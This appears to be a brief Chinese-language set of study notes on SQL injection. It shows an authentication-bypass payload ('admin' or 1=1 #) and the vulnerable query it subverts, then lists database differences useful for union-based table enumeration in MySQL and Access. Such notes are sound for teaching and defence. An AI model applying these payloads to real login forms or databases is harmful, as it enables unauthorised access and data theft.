admin' or 1=1 # (为true时) select * from tb_users where username = '{$uname}'; select * from tb_users where username = 'admin' or 1 #'; and password = 'md5(upass)'
(1)MySQL5.0以下没有information_schema这个默认数据库 (2)ACCESS没有库名,只有表和字段,并且注入时,后面必须跟表名,因此只能爆表,ACCESS没有注释 举例:select 1,2,3 from `table_name` union select 1,2,3 from `table_name` (3)MySQL使用limit排序,ACCESS使用TOP排序(TOP在MSSQL也可使用)